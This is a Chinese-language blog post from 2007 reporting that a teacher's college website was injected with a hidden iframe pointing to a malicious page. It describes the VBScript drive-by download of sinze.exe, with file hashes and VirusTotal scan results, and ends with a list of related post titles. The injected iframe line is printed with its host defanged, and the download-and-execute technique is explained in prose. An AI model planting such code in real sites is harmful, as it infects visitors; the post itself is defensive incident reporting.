01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
来源:互联网 发布:查看端口状态 编辑:程序博客网 时间:2024/05/17 07:55
endurer 原创
2007-01-15 第2版 补充Kaspersky的反应
2007-01-12 第1版
网站的网页被加入代码:
/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/
sin**ze*.htm Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei。
在浏览器中打开该网页,会看到信息:
/------
就不让你看!气死你 by ******!
------/
其中******处的字符串可能是作者昵称,这里偶匿了。
还没完,网页中接下来有利用Replace()来保护自身的VBScript脚本,会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%/g0ld.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
sinze.exe 采用 ASPack 加壳
文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-12 16:21:11
修改时间 : 2007-1-12 16:21:13
访问时间 : 2007-1-12 16:28:57
大小 : 88708 字节 86.644 KB
MD5 : 118e7d74d99e10cef293b254e1dc78ff
Complete scanning result of "__25968", received in VirusTotal at 01.12.2007, 10:20:11 (CET).
Antivirus Version Update Result
AntiVir 7.3.0.21 01.09.2007 HEUR/Crypted Authentium 4.93.8 01.12.2007 could be a corrupted executable file Avast 4.7.892.0 12.30.2006 no virus found AVG 386 01.11.2007 no virus found BitDefender 7.2 01.12.2007 no virus found CAT-QuickHeal 9.00 01.12.2007 no virus found ClamAV devel-20060426 01.12.2007 no virus found DrWeb 4.33 01.12.2007 no virus found eSafe 7.0.14.0 01.10.2007 Suspicious Trojan/Worm eTrust-InoculateIT 23.73.112 01.12.2007 no virus found eTrust-Vet 30.3.3319 01.11.2007 no virus found Ewido 4.0 01.11.2007 no virus found Fortinet 2.82.0.0 01.12.2007 suspicious F-Prot 3.16f 01.11.2007 no virus found F-Prot4 4.2.1.29 01.12.2007 no virus found Ikarus T3.1.0.27 01.09.2007 no virus found Kaspersky 4.0.2.24 01.12.2007 no virus found McAfee 4937 01.11.2007 no virus found Microsoft 1.1904 01.12.2007 no virus found NOD32v2 1972 01.11.2007 no virus found Norman 5.80.02 01.11.2007 no virus found Panda 9.0.0.4 01.12.2007 no virus found Prevx1 V2 01.12.2007 no virus found Sophos 4.13.0 01.11.2007 no virus found Sunbelt 2.2.907.0 01.12.2007 VIPRE.Suspicious TheHacker 6.0.3.147 01.11.2007 no virus found UNA 1.83 01.11.2007 no virus found VBA32 3.11.2 01.10.2007 no virus found VirusBuster 4.3.19:9 01.11.2007 no virus foundAditional Information
File size: 88708 bytes
MD5: 118e7d74d99e10cef293b254e1dc78ff
SHA1: 7e562cfafef92b5f17d279beb2c968bd9e612817
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
今天重下载了这个文件:
文件说明符 : D:/test/sinze.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-15 16:11:33
修改时间 : 2007-1-15 16:13:51
访问时间 : 2007-1-15 16:14:42
大小 : 425569 字节 415.609 KB
MD5 : 03111c59838bf6e6a16ad64413ed3954
下载过程中曾被KAV6拦截了一次,只得到了414,453字节。
Kaspersky报为:Virus.Win32.Delf.an
- 01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
- 数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
- [07-01-06]打开某IT技术问答网站时自动下载文件sinze.exe/Trojan-Dropper.Win32.Agent.awq
- 某市发改委网站被挂马 xzz.exe/Trojan-Downloader.Win32.Delf.aof
- 某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
- 传播Virus.Win32.AutoRun.f/Worm.Win32.Delf.b的网页
- Xiaohao.exe(Virus.Win32.Agent.o)
- 某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
- 刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
- 刘三姐故乡网站加挂Trojan-PSW.Win32.Delf.qc,Worm.Win32.Agent.uu等
- 小心QQ上传播的 1407.rar / 我的照片.Exe /Trojan-PSW.Win32.Delf.agh/Worm.Win32.PaBug.cn
- 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
- 某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
- 某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
- 某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq
- 某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码
- PictureAlbum2007.zip(Trojan.Win32.Delf.ads )
- 抓到通过U盘传播的 Virus.Win32.AutoRun.ab/Worm.Win32.Agent.zhw/setup.exe
- MySql数据库服务器的启动和关闭
- 资源整合,跨库检索,信息服务平台
- 爱,原来就这么简单
- 计算机中字符的Unicode编码,简要介绍UCS、UTF、BMP、BOM,字序等名词
- c和c++面试题探讨(题目以收录时间为序,不以难度排名)
- 01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
- 我的debian经历1(windows debian grub)
- “网络隔离”安全技术发展方向概述
- SQL Server 2005学习之——常用函数与自定义函数(二)
- oscache和hibernate的集成
- 转贴一篇:《不尽阑珊----阿休罗的眼泪》
- 浅释IPv6
- 决定定居csdn了
- C/C++动态内存管理(2)
